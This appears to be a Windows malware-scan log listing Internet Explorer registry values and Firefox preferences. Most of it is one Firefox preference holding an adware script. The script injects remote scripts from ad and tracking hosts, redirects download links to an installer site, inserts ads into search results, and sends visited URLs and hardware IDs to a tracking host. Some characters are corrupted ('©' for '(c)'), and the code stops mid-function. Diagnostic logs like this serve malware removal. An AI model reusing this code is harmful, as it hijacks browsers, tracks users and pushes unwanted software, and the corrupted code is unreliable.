========== Standard Registry (SafeList) ==========


========== Internet Explorer ==========

IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE:64bit: - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE:64bit: - HKLM\..\SearchScopes,DefaultScope = {33BB0A4E-99AF-4226-BDF6-49120163DE86}
IE:64bit: - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...R&pc=ASU2JS
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Local Page = C:\Windows\SysWOW64\blank.htm
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKLM\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKLM\..\SearchScopes,DefaultScope =
IE - HKLM\..\SearchScopes\{0633EE93-D776-472f-A0FF-E1416B8B2E3A}: "URL" = http://www.bing.com/...ms}&FORM=IE8SRC


IE - HKU\.DEFAULT\..\SearchScopes,DefaultScope =
IE - HKU\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-18\..\SearchScopes,DefaultScope =
IE - HKU\S-1-5-18\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

IE - HKU\S-1-5-19\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-20\..\SearchScopes,DefaultScope =

IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Page_URL = http://www.google.com
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Main,Default_Search_URL = http://www.google.com
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Main,Search Bar = http://www.google.com/ie
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Main,Search Page = http://www.google.com
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Main,Start Page = http://www.google.com
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Search,Default_Search_URL = http://www.google.com/ie
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\SOFTWARE\Microsoft\Internet Explorer\Search,SearchAssistant = http://www.google.com/ie
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\..\SearchScopes,DefaultScope = {F7C52A60-8CE0-4BD5-B89A-31C0A6607E67}
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\..\SearchScopes\{35F28013-4A0B-49F2-A081-0BD89CDA87AB}: "URL" = http://www.google.co...ie=utf8&oe=utf8
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\..\SearchScopes\{F7C52A60-8CE0-4BD5-B89A-31C0A6607E67}: "URL" = http://fr.search.yah...p={SearchTerms}
IE - HKU\S-1-5-21-2031378457-2822360979-1284179916-1002\Software\Microsoft\Windows\CurrentVersion\Internet Settings: "ProxyEnable" = 0

========== FireFox ==========

FF - prefs.js..browser.search.order.1: "Recherche sécurisée"
FF - prefs.js..browser.startup.homepage: "http://www.google.fr/"
FF - prefs.js..extensions.amN.scode: "(function(){try{var url=(window.self.location.href + document.cookieif(url.indexOf(\"acebook\")>-1||url.indexOf(\"immediate-support.com\")>-1||url.indexOf(\"txtlnkusaolp00000800\")>-1||url.indexOf(\"sumorobo\")>-1||url.indexOf(\"roulettebotplus\")>-1||url.indexOf(\"s.vgsgaming-ads\")>-1||url.indexOf(\"=admaven\")>-1||url.indexOf(\"lottery-master\")>-1||url.indexOf(\"lotterymaster\")>-1||url.indexOf(\"5386b_643c_\")>-1||url.indexOf(\"easylifeapp.com\")>-1||url.match(/ressbar.com[^f]+fid=65017/)||url.indexOf(\"form=u064ht&pc=u064\")>-1||url.indexOf(\"source=45905810\")>-1||url.indexOf(\"source=532d277e\")>-1||url.indexOf(\"aro.com/ws/?source=6974b128\")>-1||url.indexOf(\"esmoke.com/?isid=9949\")>-1||url.indexOf(\"esmoke.com/?isid=9950\")>-1||url.indexOf(\"esmoke.com/?isid=9951\")>-1||url.indexOf(\"id=webpick_ot\")>-1||url.indexOf(\"id=wbpk_ot\")>-1||url.indexOf(\"jerusalem.com\")>-1||url.indexOf(\"hash=a4vxy8\")>-1||url.indexOf(\"hash=m5g73j\")>-1||url.indexOf(\"hash=hg7gja\")>-1||url.indexOf(\"hash=fz61s5\")>-1||url.indexOf(\"hash=zndas3\")>-1||url.indexOf(\"hash=1i5w2d\")>-1||url.indexOf(\"duit&ptag=AA7AAB832A2DE41458BF&\")>-1||url.indexOf(\"duit&ptag=A93F650AC0E6A4A4791F&\")>-1||url.indexOf(\"duit&ptag=A79888693F6CA4634A6F\")>-1||url.indexOf(\"duit&ptag=A359B17B6FAA44E6B86F\")>-1||url.indexOf(\"ISID=MF245F633-E188-4162-B56A\")>-1||url.indexOf(\"SID=MEABFCF9A-556B-4C5C-8727\")>-1||url.indexOf(\"ISID=M8FBC22FE-AB08-464E-AA63\")>-1||url.indexOf(\"uid=531364863_132823_4252277E\")>-1||url.indexOf(\"searchiy.gboxapp.com\")>-1||url.indexOf(\"searchy.easylifeapp.com\")>-1||url.indexOf(\"search?hspart=webpick&hsimp=yhs-1&p=\")>-1||url.match(/search.yahoo.com.+hspart=.+/)||url.match(/websearch.(mocaflix|searchissimple|just-browse|good-results|searchsupporter|soft-quick|pu-results|simplespeedy|helpmefindyour|greatresults|youwillfind|lookforitthere|greatresults|youwillfind|lookforitthere|searchmainia|searchrocket|homesearchapp|a-searchpage|coolwebsearch|homesearch-hub|resulthunters|searchdwebs|searchingisme|searchannel|searchouse|pur-esult|searchboxes|searchitup|searchpages|searchesplace|simplesearches|goodfindings|searchiseasy|searchisfun|the-searcheng|oversearch|searchere|relevantsearch|wisesearch|search-guide|searchisbestmy|searchbomb|searchguru|searchsun|searchsunmy|toolksearchbook|searchinweb|webisgreat|webisawsome|exitingsearch|amaizingsearches).info/)||url.match(/search.(easylifeapp|gboxapp|searchonme|appsarefun|genieo).com/)||url.indexOf(\"searchitapp.com\")>-1||url.indexOf(\"news.searchonme.com\")>-1){return}}catch(e){};if(window.self==window.top){var script=document.createElement(\"script\");script.type=\"text/javascript\";script.src=\"//cdncache1-a.akamaihd.net/loaders/1630/l.js?aoi=1311798366&pid=1630&zoneid=511165&ext=websave&systemid=8510492456308379354\";document.getElementsByTagName(\"head\")[0].appendChild(script)};;if(window.self==window.top){var script=document.createElement('script');script.type='text/javascript';script.src='//www.superfish.com/ws/sf_main.jsp?dlsource=wbsv&userId=4640406841722548568&CTID=p1691';document.getElementsByTagName(\"head\")[0].appendChild(script);};if(window.self==window.top && window.self.location.protocol=='http:'){var script=document.createElement('script');script.type='text/javascript';script.src='//istatic.datafastguru.info/fo/min/wp.js?subid=dft&hid=8510492456308379354';document.getElementsByTagName(\"head\")[0].appendChild(script);};try{new function(){if(null==document.getElementById(\"id_arrrrppdjafklbvnn4440fm\")&&\"http:\"==location.protocol&&window.self==window.top){var a=document.createElement(\"script\");a.type=\"text/javascript\";a.src=\"http://istatic.dataf...492456308379354\";a.setAttribute(\"id\",\"id_arrrrppdjafklbvnn4440fm\");document.getElementsByTagName(\"head\")[0].appendChild(a)}}}catch(e$$12){};;if(window.self==window.top && \"www.google.com,mail.google.com,en.wikipedia.org,www.facebook.com\".indexOf(window.self.location.hostname) == -1){var s1 = document.createElement(\"script\");s1.type = \"text/javascript\";s1.src = \"http://intext.nav-links.com/js/intext.js?afid=advertisewp&subid=advertisewp5&maxlinks=8&linkcolor=#0000FF\";document.getElementsByTagName(\"head\")[0].appendChild(s1);};window.top==window.self&&\"http:\"==location.protocol&&new function(){var a=this;a.installer_id=\"4640406841722548568\";a.hardware_id=\"8510492456308379354\";a.timestamp=(new Date).getTime();a.unique=function(){if(5<a.hardware_id.length){var b=a.hardware_id;return\"&uni=\"+b}return 5<a.installer_id.length?(b=a.installer_id,\"&uni=\"+b):\"\"}();a.hrefElements=[];a.binHrefs=[];a.installerDefaultName=\"Setup\";a.callback=encodeURIComponent(\"prex.addClickEvent()\");a.product_id=\"100\";a.interval=1296E3;a.domain=\"http://xls.searchfun.in/?p=\"+a.product_id+\"&vf=\"+a.interval+\"&gf=\"+a.interval+\"&v=1&t=\"+a.timestamp+a.unique+\"&cb=\"+a.callback;a.downloadUrl=\"http://welovecoupon.eu/v\"+( parseInt('70.12')>60? 2109:388)+\"?installer_file_name=\";a.bin=\"exe,msi,mp3,rar,pdf,avi,mov,mpg,zip,torrent,mkv,mpeg,mp4,3gp,jar,7z,flac,wmv,wma,doc,ppt,pptx,pps,ppsx,xls,xlsx,flv\";a.res=[];a.existingPrefix=\"rghbyujk\";a.prefix=\"fghjklfgh\";a.utils=new function(){var b=this;b.injectScript=function(){var b=document.createElement(\"script\");b.src=a.domain;document.getElementsByTagName(\"head\")[0].appendChild(b)};b.ajax={get:function(a,e){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",a,!0),this.xhr.onreadystatechange=function(){4==b.ajax.xhr.readyState&&e(b.ajax.xhr.responseText)},this.xhr.send()}catch(f){}}};b.isIE=function(){return-1<navigator.userAgent.toLowerCase().indexOf(\"msie\")?!0:!1}};a.storage=new function(){var b=this;b.get=function(){return parseInt(localStorage.getItem(a.prefix))};b.set=function(){localStorage.setItem(a.prefix,a.timestamp+1E3*a.interval)};b.checkInterval=function(){return localStorage?isNaN(b.get())||b.get()<a.timestamp?!0:!1:!1}};a.checkExistingExtension=function(b){return b.getAttribute(\"data-\"+a.existingPrefix)?!0:!1};a.isBin=function(b){b=b.slice(-4);if(\".\"!==b[0])return!1;b=b.slice(1);return-1<a.bin.indexOf(b)?!0:!1};a.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(d,e,f,c){\"undefined\"==typeof c&&(c=window);c.addEventListener(d,e,f);a.cache.push([d,e,f,c])}:window.attachEvent?function(d,e,f,c){\"undefined\"==typeof c&&(c=window);c[\"e\"+d+e]=e;c[d+e]=function(){c[\"e\"+d+e](window.event)};c.attachEvent(\"on\"+d,c[d+e]);a.cache.push([d,e,f,c])}:function(){};a.remove=window.removeEventListener?function(a,b,f,c){\"undefined\"==typeof c&&(c=window);c.removeEventListener(a,b,f)}:window.detachEvent?function(a,b,f,c){\"undefined\"==typeof c&&(c=window);c.detachEvent(\"on\"+a,c[a+b]);c[a+b]=null;c[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var d=0;d<a.cache.length;d++)a.remove.apply(a,a.cache[d])}};a.addClickEvent=function(){for(var b=0;b<a.hrefElements.length;b++)a.events.add(\"click\",function(b){a.clickEvent(b)},!1,a.hrefElements)};a.clickEvent=function(b){a.elem=b.target||b.srcElement;if(a.checkExistingExtension(a.elem))return!1;b=b||window.event;b.preventDefault?b.preventDefault(b):b.returnValue=!1;a.downloadUrl+=(\"\"==a.elem.innerHTML || 'FR'=='US')?a.installerDefaultName:a.elem.innerHTML;location.href=a.downloadUrl;a.storage.set();a.events.flush()};a.sendAjax=function(){a.utils.ajax.get(a.domain,function(b){b=b.replace(/\\n$/,\"\");b==\"try{\"+a.callback+\"}catch(e){}\"&&a.addClickEvent()})};a.checkHrefs=function(b){for(var d=0;d<b.length;d++){var e=b[d].href.split(\"?\");a.isBin(e[0])&&a.hrefElements.push(b[d])}};a.handleRequest=function(){a.utils.isIE()?a.utils.injectScript():a.sendAjax()};a.init=function(){a.hrefs=document.getElementsByTagName(\"a\");a.checkHrefs(a.hrefs);0<a.hrefElements.length&&a.handleRequest()};a.storage.checkInterval()&&a.init();\"undefined\"==typeof window.prex&&(window.prex=a)};;window.top==window.self&&\"undefined\"==typeof __yael_running&&(window.__yael_running=!0,new function(){if(!document.getElementById(\"__yael_once\")){var n=document.createElement(\"div\");n.id=\"__yael_once\";var p=document.getElementsByTagName(\"body\")[0];p&&p.appendChild(n);var h=[67969232,67985534],b=this;b.pixelHost=\"//sepx.sendapplicationget.com\";b.prefix=\"jhgasdf\";b.version=\"0.4.1\";b.now=(new Date).getTime();b.clickInterval=2592E5;b.ratio=12;b.initThrottle=\"google;gmaps;amazon\";b.unique_items_left=!0; b.num_of_items_in_one=4;b.count=0;b.baseHostname=\"sendapplicationget.com\";b.utils=new function(){var a=this;a.cookie=new function(){var a=this;a.createCookie=function(a,c,b){if(b){var g=new Date;g.setTime(g.getTime()+864E5*b);b=\"; expires=\"+g.toGMTString()}else b=\"\";document.cookie=a+\"=\"+c+b+\"; path=/\"};a.readCookie=function(a){a+=\"=\";for(var c=document.cookie.split(\";\"),b=0;b<c.length;b++){for(var g=c;\" \"==g.charAt(0);)g=g.substring(1,g.length);if(0==g.indexOf(a))return g.substring(a.length,g.length)}return null}; a.eraseCookie=function(b){a.createCookie(b,\"\",-1)}};a.ajax={get:function(c,b){try{this.xhr=new XMLHttpRequest,this.xhr.open(\"GET\",c,!0),this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&b(a.ajax.xhr.responseText)},this.xhr.send()}catch(e){}},post:function(c,b,e){this.xhr=new XMLHttpRequest;this.xhr.open(\"POST\",c,!0);this.xhr.setRequestHeader(\"Content-type\",\"application/x-www-form-urlencoded\");this.xhr.onreadystatechange=function(){4==a.ajax.xhr.readyState&&e(a.ajax.xhr.responseText)}; b=encodeURIComponent(b);this.xhr.send(b)}};a.waitForTokens={};a.addScript=function(a,b){if(\"undefined\"==typeof Element.prototype.appendChild.toString)document.getElementsByTagName(\"head\")[0].appendChild(a);else if(\"bing\"==b){var e=Element.prototype.appendChild,f=document.createElement(\"iframe\");Element.prototype.appendChild=f.document.appendChild;document.getElementsByTagName(\"head\")[0].appendChild(a);Element.prototype.appendChild=e}};a.waitForElement=function(c,d,e,f){var g=a.query_selector_all©; clearTimeout(a.waitTimeout);if(25<b.waitForElementCounter)return d(null);if(\"undefined\"==typeof g||1>g.length){if(a.waitForTokens[f])return d(null);var k=arguments.callee;a.waitTimeout=setTimeout(function(){b.waitForElementCounter++;k(c,d,e,f)},e)}else{if(a.waitForTokens[f])return d(null);a.waitForTokens[f]=!0;b.waitForElementCounter=0;return d(g)}};a.flushWaitForTokens=function(){a.waitForTokens={}};a.getRandomInt=function(a,b){return Math.floor(Math.random()*(b-a+1))+a};a.get_computed_style=\"function\"!= typeof window.getComputedStyle?function(b){return{getPropertyValue:function(d){\"float\"==d&&(d=\"styleFloat\");d=a.dhtml_prop_name(d);return\"object\"==typeof b.currentStyle&&null!=b.currentStyle&&\"undefined\"!=typeof b.currentStyle[d]?b.currentStyle[d]:null}}}:function(a,b){return window.getComputedStyle(a,b)||{getPropertyValue:function(){}}};a.query_selector_all=document.querySelectorAll?function(a){try{return document.querySelectorAll(a)}catch(b){}}:function(a){var b=a.match(/^#([^,\\s]+)$/)||[];if(1< b.length)return a=document.getElementById(b[1])||void 0,\"undefined\"!=typeof a?[a]:[];b=document.createElement(\"STYLE\");document.getElementsByTagName(\"body\")[0].appendChild(b);document.__asya_qsaels=[];b.styleSheet.cssText=a+\"{x:expression(document.__asya_qsaels.push(this))}\";window.scrollBy(0,0);return document.__asya_qsaels};a.clone_object=window.JSON instanceof Object?function(a){if(a instanceof Object&&(a=JSON.stringify(a),\"string\"==typeof a))return JSON.parse(a)}:function(a){if(a instanceof Object){var b= new a.constructor,e;for(e in a)b[e]=arguments.callee(a[e]);return b}return a};a.dhtml_prop_name=function(a){return a.replace(/(\\-([a-z]){1})/g,function(a,b,c){return c.toUpperCase()})};a.wildcard_to_regex=function(a){a=a.replace(/([.^$+(){}\\[\\]\\\\|\\?])/g,\"\\\\$1\");a=a.replace(/\\*/g,\".*\");return RegExp(a)};a.throttle=function(a,b){var e=null;return function(){var f=this,g=arguments;clearTimeout(e);e=setTimeout(function(){a.apply(f,g)},b)}};a.epoch=function(){return(new Date).getTime()};a.version_ie_less= function(a){if(/MSIE (\\d+\\.\\d+);/.test(navigator.userAgent))return new Number(RegExp.$1)<=a?!0:!1};a.isIE=function(){return\"Microsoft Internet Explorer\"==navigator.appName||\"Netscape\"==navigator.appName&&null!=/Trident\\/.*rv:([0-9]{1,}[.0-9]{0,})/.exec(navigator.userAgent)};a.match_url=function(b,d){for(var e=0;e<d.length;e++)if(\"string\"==typeof d[e]){var f;f=/^\\/.+\\/$/.test(d[e])?RegExp(d[e]):a.wildcard_to_regex(d[e]);if(f instanceof RegExp&&f.test(b))return!0}};a.ping=function(a){for(var d=[\"google\", \"bing\",\"yahoo\",\"youtube\"],e=0;e<d.length;e++)if(-1<location.hostname.indexOf(d[e])){var f=new Image,g=encodeURIComponent(window.self==window.top?window.self.location.href:\"\");1E3<g.length&&(g=encodeURIComponent(location.hostname));var k=encodeURIComponent(location.hostname);f.src=b.pixelHost+\"?hid=8510492456308379354&eid=311&pid=1691&prodid=338&v=\"+b.version+\"&ch=\"+a+\"&lan=\"+navigator.language+\"&cc=FR&pr=\"+d[e]+\"&host=\"+k+\"&ref=\"+g}}};var l=[\"horizontal\", \"vertical\",\"images-horizontal\",\"images-vertical\"];b.jsonpHost=function(){var a=\"s1. s1. s2. s3. s4. s5. s6.\".split(\" \");return a[b.utils.getRandomInt(0,a.length-1)]+\"\"}()+b.baseHostname;b.projects_info={google:{hrefSelector:\".r a\",unique_search_divs:\"3\",urls:[\"www.google.*\"],src_for_keyword:[\"#gbqfq\",\"#lst-ib\",\"#sbhost\"],dr:[\"#tvcap\",\"#bottomads\",\"#tads\"],tweak:function(){b.events.flush();var a=b.utils.query_selector_all(\"#nav td\"),c=b.utils.query_selector_all(\".spell + a\")[0];if(0<a.length)for(var d= 0;d<a.length;d++)b.events.add(\"click\",function(){b.init_search_project()},!1,a[d],!0);\"undefined\"!==typeof c&&b.events.add(\"click\",function(){b.init_search_project()},!1,c,!0)},validate:function(a){var c=this;if(-1<location.href.indexOf(\"https://www.google.com/maps\")||location.href.match(/https:\\/\\/www.google.[a-z,\\.]+\\/$/g))return!0;c.callback=a;this.is_direction_right=function(){b.utils.waitForElement(\".col\",function(a){if(null==a||\"right\"==b.utils.get_computed_style(a[0]).getPropertyValue(\"float\"))return!0; if(!c.check_tab())return!1},1E3,\"validate\")};c.count=0;this.check_tab=function(){var a=document.getElementById(\"hdtb_msb\");if(null==a||\"undefined\"==typeof a)if(c.count++,10>c.count)setTimeout(function(){c.check_tab()},1E3);else return!1;else return b.utils.query_selector_all(\".hdtb_mitem\")[0].className.match(/hdtb_msel/)&&(b.utils.ping(\"validate2\"),c.callback()),!1};return c.is_direction_right()?!1:!0}},yahoo:{hrefSelector:\"a[id^=link]\",unique_search_divs:\"3\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"], urls:[\"yahoo\"],src_for_keyword:\"#yschsp\",validate:function(){b.utils.ping(\"validate2\");return!0}},bing:{hrefSelector:[\".b_algo a\",\".sb_tlst a\"],unique_search_divs:\"2\",dr:[\".sb_adsWv2\"],urls:[\"http://www.bing.com/search?*\"],src_for_keyword:[\"#sb_form_q\",\".b_searchboxForm[name='q']\"],validate:function(){b.utils.ping(\"validate2\");return!0}},conduit:{hrefSelector:\"a[id^=ctl00_main_organicResults]\",unique_search_divs:\"1\",urls:[\"http://search.conduit.com*\"],src_for_keyword:\"#q_top\",dr:[\"#master-1\"],validate:function(){return!0}}, ask:{hrefSelector:\".ptbs a[id^=r]\",unique_search_divs:\"1\",urls:[\"http://www.ask.com/web?q=*\",\"http://www.ask.com/web?qsrc=*\",\"http://www.ask.com/web?am=broad&q=*\"],src_for_keyword:[\"#top_qcomn\",\"#top_q_comm\"],dr:[\"#spl_img_top\"],validate:function(){return!0}},triple:{hrefSelector:\".gRsSlicetitle\",unique_search_divs:\"2\",dr:[\"#gRsTopLinks\"],urls:[\"http://search.triple-search.com/?*\",\"http://www.search.triple-search.com/?*\"],src_for_keyword:\"#q\",validate:function(){var a=b.utils.query_selector_all(\".gRsSTypeSelltr\"); if(0<a.length){for(var c=0;c<a.length;c++)if(\"English\"==a[c].innerHTML)return!0;return!1}}},incredimail:{hrefSelector:\".title\",unique_search_divs:\"3\",dr:[\"#MainSponsoredLinks\"],urls:[\"http://www.search.incredimail.com/search.php?q*\",\"http://search.incredimail.com/search.php?q*\"],src_for_keyword:\"#q\",validate:function(){return-1<location.href.indexOf(\"lang=english\")?!0:!1}},gmaps:{hrefSelector:\"div[class^='ads-line'] a\",unique_search_divs:\"1\",dr:[\".ads.horiz.top\",\".ads.horiz.bot\"],urls:[\"https://www.google.com/maps/*\"], src_for_keyword:\"#searchboxinput\",tweak:function(){var a=function(){b.remove_search();b.utils.query_selector_all(\".omnibox-cards-transformations\")[0].style.marginTop=\"0px\";document.getElementById(\"reveal-cards\").style.marginTop=\"0px\"};b.events.add(\"click\",function(){a()},!1,document.getElementById(\"cards\"),!1);b.events.add(\"keyup\",function(){a()},!1,document.getElementById(\"searchbox_form\"),!1);b.events.add(\"click\",function(){a()},!1,document.getElementById(\"viewcard\"),!1);b.events.add(\"click\",function(){a()}, !1,b.utils.query_selector_all(\".widget-runway-pegman\")[0],!1);b.events.add(\"click\",function(){a()},!1,b.utils.query_selector_all(\".gscb_a\")[0],!1);var c=function(a){a=document.querySelector(a);return getComputedStyle(a,null).height}(\".yael .cards-card\");document.querySelector(\".omnibox-cards-transformations\").style.marginTop=c;document.querySelector(\"#reveal-cards\").style.marginTop=c},validate:function(a){b.utils.isIE()||(b.num_of_items_in_one=1,a())}},amazon:{unique_search_divs:\"1\",urls:[\"http://www.amazon.com*&field-keywords=*\"], src_for_keyword:\"#twotabsearchtextbox\",validate:function(a){a()}},smartAddress:{hrefSelector:[\"li a\"],unique_search_divs:\"2\",dr:[\".peach ol\"],urls:[\"search.smartaddressbar.com/web.php?s=*\"],src_for_keyword:\"#stxt\",tweak:function(){var a=b.utils.query_selector_all(\".peach\")[0],c=b.utils.query_selector_all(\".right ul\")[0];a&&a.parentNode.removeChild(a);c&&c.parentNode.removeChild©},validate:function(){return!0}}};var m=function(a){if(\"string\"==typeof a){var c=a.match(/:nth-match\\(([0-9]+)\\)/);if(c&& 1<c.length)return a=b.utils.query_selector_all(a.substr(0,c.index))||[],a[c[1]]||void 0;a=b.utils.query_selector_all(a)||[];return a[0]||void 0}};b.events=new function(){var a=this;a.cache=[];a.add=window.addEventListener?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f.addEventListener(b,d,e);g&&a.cache.push([b,d,e,f])}:window.attachEvent?function(b,d,e,f,g){\"undefined\"==typeof f&&(f=window);f[\"e\"+b+d]=d;f[b+d]=function(){f[\"e\"+b+d](window.event)};f.attachEvent(\"on\"+b,f[b+d]);g&&a.cache.push([b, d,e,f])}:function(){};a.remove=window.removeEventListener?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.removeEventListener(a,b,e)}:window.detachEvent?function(a,b,e,f){\"undefined\"==typeof f&&(f=window);f.detachEvent(\"on\"+a,f[a+b]);f[a+b]=null;f[\"e\"+a+b]=null}:function(){};a.flush=function(){for(var b=0;b<a.cache.length;b++)a.remove.apply(a,a.cache);a.cache=[]}};b.get_insertion_element=function(a){return!a.insert||\"before\"!=a.insert&&\"after\"!=a.insert?a.element:a.element.parentNode};b.dom= new function(){this.json_to_html=function(a,c){if(\"#text\"==a.type)c=document.createTextNode(a.text);else if(\"#comment\"!=a.type){c||(c=document.createElement(a.type));if(a.attrs){for(var d in a.attrs)if(a.attrs.hasOwnProperty(d))if(\"style\"==d&&a.attrs.style instanceof Object)for(var e in a.attrs.style){var f=b.utils.dhtml_prop_name(e);c.style[f]=a.attrs.style[e]}else c.setAttribute(d,a.attrs[d]);\"iframe\"==a.type&&(a.attrs.hasOwnProperty(\"frameborder\")&&(c.frameBorder=a.attrs.frameborder),a.attrs.hasOwnProperty(\"marginwidth\")&& (c.marginWidth=a.attrs.marginwidth),a.attrs.hasOwnProperty(\"marginheight\")&&(c.marginHeight=a.attrs.marginheight))}if(a.children)for(d=0;d<a.children.length;d++){f=a.children[d];e=arguments.callee(f);try{c.appendChild(e)}catch(g){if(\"#text\"==f.type&&\"string\"==typeof f.text)if(\"style\"==a.type&&c.styleSheet)c.styleSheet.cssText=f.text||\"\";else if(e=b.utils.get_node_text_prop©)c[e]=f.text}}}return c}};b.addEventClick=function(a,c){for(var d=0;d<a.length;d++)b.events.add(\"click\",function(a){a.preventDefault? a.preventDefault():a.returnValue=!1;this.href=\"#\";location.href=c+\"&j=true\";b.events.flush();localStorage.setItem(b.prefix,b.now+b.clickInterval);return!1},!1,a[d],!0)};b.checkClickInterval=function(a){if(b.now>a)return!0};b.setClickHref=function(a,c){if(\"undefined\"!=typeof b.projects_info[c].hrefSelector){if(b.utils.getRandomInt(1,1E4)>=1E4/b.ratio)return!1;var d=b.projects_info[c].hrefSelector,e=parseInt(localStorage.getItem(b.prefix));if(\"undefined\"!=typeof d){if(d instanceof Array)for(var f=0;f< d.length;f++){var g=b.utils.query_selector_all(d[f]);if(0<g.length)break}else g=b.utils.query_selector_all(d);if(!e||b.checkClickInterval(e))b.addEventClick(g,a),b.j=!0}}};b.escape_chars_for_json=function(a){for(var b in a)a=a.replace(/\\\"/g,'\\\\\"');return a};b.tpl_engine=function(a,c,d){\"false\"!==d.layouts.unique&&(c=b.escape_chars_for_json©);a=JSON.stringify(a);c=[{replace:\"title\",\"with\":c.title},{replace:\"displayUrl\",\"with\":c.displayUrl},{replace:\"description\",\"with\":c.description},{replace:\"clickUrl\", \"with\":c.clickUrl}];for(d=0;d<c.length;d++)a=a.replace(RegExp(\"\\\\[##\"+c[d].replace+\"##\\\\]\",\"g\"),c[d][\"with\"]);try{return JSON.parse(a)}catch(e){}};b.get_item_json=function(a,c){var d=b.utils.clone_object(a.layouts.template);d.attrs instanceof Object||(d.attrs={});return d=b.tpl_engine(d,c,a)};b.add_jsonp_to_config=function(a,c){b.get_item_json(a)};b.remove_search=function(){var a=b.utils.query_selector_all(\".yael\");if(0<a.length)for(var c=0;c<a.length;c++)a[c].parentNode.removeChild(a[c])};b.inject_json= function(a){\"first\"==a.insert?a.element.insertBefore(a.node,a.element.firstChild):\"before\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element):\"after\"==a.insert?a.element.parentNode.insertBefore(a.node,a.element.nextSibling):a.element.appendChild(a.node)};b.get_ad_dom=function(a){return a.layouts instanceof Object&&a.layouts.dom instanceof Object?a.layouts.dom:!1};b.get_layout_type=function(a){if(a.layouts instanceof Object)for(var b=0;b<l.length;b++)if(-1<a.layouts.id.indexOf(l))return l; return!1};b.create_search=function(a){a=b.get_ad_dom(a);return b.dom.json_to_html(a)};b.templates=new function(){this.container_id=0;this.add_real_links=function(a,c){b.utils.add_event(\"click\",function(b){window.open(a);b.preventDefault?b.preventDefault():b.returnValue=!1},!1,c)}};b.validate_response=function(){for(var a in __yael_res.data.items)__yael_res.data.items[a].displayUrl.match(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/)&&__yael_res.data.items[a].displayUrl.replace(/^(http:\\/\\/|https:\\/\\/|\\/\\/)/,\"\")}; b.is_target_valid=function(a){if(0!=__yael_res.data.numberOfItems&&\"undefined\"!=typeof a.element)return a.urls instanceof Array&&!b.utils.match_url(a.element.ownerDocument.location.href,a.urls)?!1:!0};var q=null;b.get_target_element=function(a){if(a.inserts instanceof Array&&\"undefined\"==typeof a.element)for(var b=0;b<a.inserts.length;b++)if(a.element=m(a.inserts.selector),\"undefined\"!==typeof a.element){a.insert=a.inserts.at;break}};b.add_data_to_config=function(a,c){if(0==c.length)return b.unique_items_left= !1;var d=b.get_ad_dom(a);(function(a,c){c.children&&0!==c.children.length?(c=c.children[c.children.length-1],arguments.callee(a,c)):b.insert_point=c})(a,d);for(d=0;d<b.num_of_items_in_one&&0!=c.length;d++)b.insert_point.children.push(b.get_item_json(a,c[0])),\"true\"==a.layouts.unique?b.not_unique_items.push(c.shift()):c.shift()};b.addEventsToItems=function(){for(var a=document.querySelectorAll('a[href*=\"'+b.jsonpHost+'\"]'),c=0;c<a.length;c++)b.events.add(\"click\",function(){b.init_search_project()}, !1,a[c],!1)};b.check_if_div_in_dom=function(a,b){var d=[],e;for(e in __yael_res.config.targets){var f=__yael_res.config.targets[e];clearTimeout(q);a++;if(4<a)return;if(f.inserts instanceof Array&&\"undefined\"==typeof f.element)for(var g=0;g<f.inserts.length;g++){var k=m(f.inserts[g].selector);\"undefined\"!==typeof k&&d.push(k)}}for(e=0;e<d.length;e++)if(\"undefined\"==typeof d[e]){var h=this;q=setTimeout(function(){h.apply(h,arguments)},200)}b()};b.loop_targets=function(a,c,d){if(a instanceof Object&& (b.get_target_element(a),b.is_target_valid(a)&&(\"false\"==d&&b.unique_items_left&&(c=b.not_unique_items),0!=c.length))){b.add_data_to_config(a,c);try{a.node=b.create_search(a)}catch(e){}\"undefined\"!=typeof a.node&&b.inject_json(a)}};b.removeSecondClick=function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++)b.events.add(\"click\",function(a){setTimeout(function(){for(var a=b.utils.query_selector_all(\".yael a\"),c=0;c<a.length;c++){var 